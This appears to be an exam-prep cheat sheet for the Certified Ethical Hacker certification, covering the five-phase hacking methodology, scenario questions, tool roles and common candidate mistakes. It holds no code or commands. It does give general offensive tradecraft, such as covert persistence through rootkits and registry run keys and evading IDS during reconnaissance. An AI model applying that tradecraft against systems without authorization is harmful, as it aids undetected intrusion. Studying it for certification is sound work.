Home / cybersecurity / Certified Ethical Hacker / Cheat Sheet
Certified Ethical Hacker· Exam reference card · 2026 · Edureify AI
Certified Ethical Hacker

Certified Ethical Hacker Cheat Sheet

CEH Tests Ethical Hacking Methodology and Tool Selection — Not Just Attack Knowledge

CEH tests whether you can execute a structured penetration testing process — reconnaissance, scanning, gaining access, maintaining access, and covering tracks — in the right sequence.

Check Your Readiness →
Among the harder certs
Avg: Approximately 62–67%
Pass: 750 / 1000
Most candidates understand Certified Ethical Hacker concepts — and still fail. This exam tests how you apply knowledge under pressure.
Core Framework

CEH Hacking Methodology (5 Phases)

CEH covers 20 modules across ethical hacking phases, system hacking, malware threats, social engineering, web application hacking, and cryptography. The exam tests both knowledge of attack techniques and the appropriate countermeasures.

  1. 01
    1. Reconnaissance — Passive (OSINT) and active information gathering
  2. 02
    2. Scanning — Network scanning, vulnerability scanning, enumeration
  3. 03
    3. Gaining Access — Exploitation of identified vulnerabilities
  4. 04
    4. Maintaining Access — Backdoors, rootkits, persistence mechanisms
  5. 05
    5. Covering Tracks — Log manipulation, artifact removal
Scenario Traps

Wrong instinct vs correct approach

A pen tester needs to gather information about a target without being detected
✕ Wrong instinct

Conduct an Nmap scan to identify open ports and services

✓ Correct approach

Nmap is active reconnaissance — start with passive OSINT (WHOIS, DNS lookup, LinkedIn, Google dorking) before any active scanning to remain undetected and avoid triggering IDS alerts

A web application is vulnerable to SQL injection
✕ Wrong instinct

Use SQLmap to automate the entire exploitation

✓ Correct approach

CEH methodology requires manual testing and understanding of the vulnerability before using automated tools; identify the injection point, test manually, then use tools to extend the scope — automated exploitation without understanding is not ethical hacking methodology

A system has been compromised and the tester needs to maintain access
✕ Wrong instinct

Install a visible backdoor for easy re-entry

✓ Correct approach

Use covert persistence mechanisms (rootkits, scheduled tasks, registry run keys) that are less likely to be detected — and ensure all actions are within the scope of the written authorization

Quick Rules

Know these cold

  • Always get written authorization before any active testing — without it, it's illegal
  • Reconnaissance first — assive before active to minimize detection risk
  • Nmap = port/service scan; Nessus = vulnerability scan; Metasploit = exploitation framework
  • SQL injection — lways test manually first before running automated tools
  • CEH tests countermeasures equally with attack techniques — study both sides
  • Footprinting, scanning, enumeration, exploitation — do not skip phases
  • Social engineering attacks target people, not technology — training is the primary countermeasure
Self Check

Can you answer these without checking your notes?

In this scenario: "A pen tester needs to gather information about a target without being detected" — what should you do first?
Nmap is active reconnaissance — start with passive OSINT (WHOIS, DNS lookup, LinkedIn, Google dorking) before any active scanning to remain undetected and avoid triggering IDS alerts
In this scenario: "A web application is vulnerable to SQL injection" — what should you do first?
CEH methodology requires manual testing and understanding of the vulnerability before using automated tools; identify the injection point, test manually, then use tools to extend the scope — automated exploitation without understanding is not ethical hacking methodology
In this scenario: "A system has been compromised and the tester needs to maintain access" — what should you do first?
Use covert persistence mechanisms (rootkits, scheduled tasks, registry run keys) that are less likely to be detected — and ensure all actions are within the scope of the written authorization
Failure Patterns

Common Exam Mistakes — What candidates get wrong

Skipping reconnaissance phase in scenario questions

The CEH methodology always starts with reconnaissance — both passive (OSINT, DNS lookup, Google hacking) and active (ping sweep, port scan). Candidates who jump to exploitation without completing the information gathering phase answer scenario questions incorrectly.

Confusing active vs. passive reconnaissance

Passive reconnaissance doesn't interact with the target system (WHOIS, DNS lookup, social media). Active reconnaissance does interact with the target (port scanning, ping sweeps). Active reconnaissance requires authorization; passive does not. Mixing these up in legal/ethical questions is a critical error.

Misidentifying scanning tool purposes

Nmap for port and service scanning; Nessus for vulnerability scanning; Wireshark for packet capture and analysis; Metasploit for exploitation. Candidates confuse scanning tools with exploitation tools in scenario questions.

Treating countermeasures as optional knowledge

CEH tests both attack techniques AND their countermeasures. Candidates who study only the offensive side miss 30-40% of questions about defensive controls, patching, and security hardening.

Confusing SQL injection types

In-band (error-based, union-based), inferential/blind (boolean-based, time-based), and out-of-band SQL injection have different detection and exploitation techniques. Candidates who only know generic SQL injection fail specific scenario questions.

CEH tests hacking methodology, not just attack knowledge. Test whether you know the right sequence.

Start Diagnostic Test → View all exams